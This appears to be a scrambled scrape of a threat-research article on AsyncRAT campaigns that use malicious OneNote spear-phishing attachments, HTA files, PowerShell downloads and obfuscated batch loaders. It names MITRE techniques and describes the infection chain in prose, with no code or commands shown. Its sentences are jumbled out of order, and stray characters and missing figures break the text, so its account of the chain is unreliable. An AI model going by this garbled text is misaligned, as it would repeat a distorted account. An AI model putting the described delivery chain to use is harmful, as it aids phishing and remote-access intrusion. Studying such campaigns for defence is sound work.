HTA file using a PowerShell cmdlet Invoke-Webrequest to download both the decoy. one file will act as a decoy document to hide the execution of the malicious. bat script that will decode the actual AsyncRAT malware. one file is responsible for downloading a. HTA file to download the second stage of this infection chain.įigure 2 T1218.005 - System Binary Proxy Execution: Mshta The malicious OneNote document will lure the targeted user to click through the warning to view the document as seen in Figure 2.Īs soon as the user clicks, it will automatically load a malicious. The Splunk Threat Research Team (STRT) found several phishing email campaigns that contain malicious. Technical Analysis OneNote Campaign T1566.004 - Phishing: Spear Phishing Attachment Malicious OneNote Attachment In the following sections, we explore a recent OneNote campaign, how to extract the AsyncRAT configuration, dive into common behaviors and review additional AsyncRAT script loaders. Watch the video below to learn more about AsyncRAT OneNote campaign.įigure 1 shows a short summary infection chain of OneNote campaigns that are discussed further in this article, including other interesting phishing campaigns that load different scripts to execute AsyncRAT.įigure 1 (For a larger resolution of this diagram visit this link)ĪsyncRAT has also been in the weekly TOP 10 malware trends tracker on for the past few months. Of the many features of AsyncRAT, it encrypts C2 communication protocol and contains several features via plugin including: HTA file that downloads and runs an obfuscated batch script to execute the actual AsyncRAT code. One prevalent campaign in the wild with this remote access trojan is the use of a Microsoft OneNote spear phishing attachment to load a. Threat actors and adversaries used several interesting script loaders and spear phishing attachments to deliver AsyncRAT to targeted hosts or networks in different campaigns. AsyncRAT is a popular malware commodity and tools used by attackers and APT groups. In January 2019 AsyncRAT was released as an open source remote administration tool project on GitHub.
0 Comments
Leave a Reply. |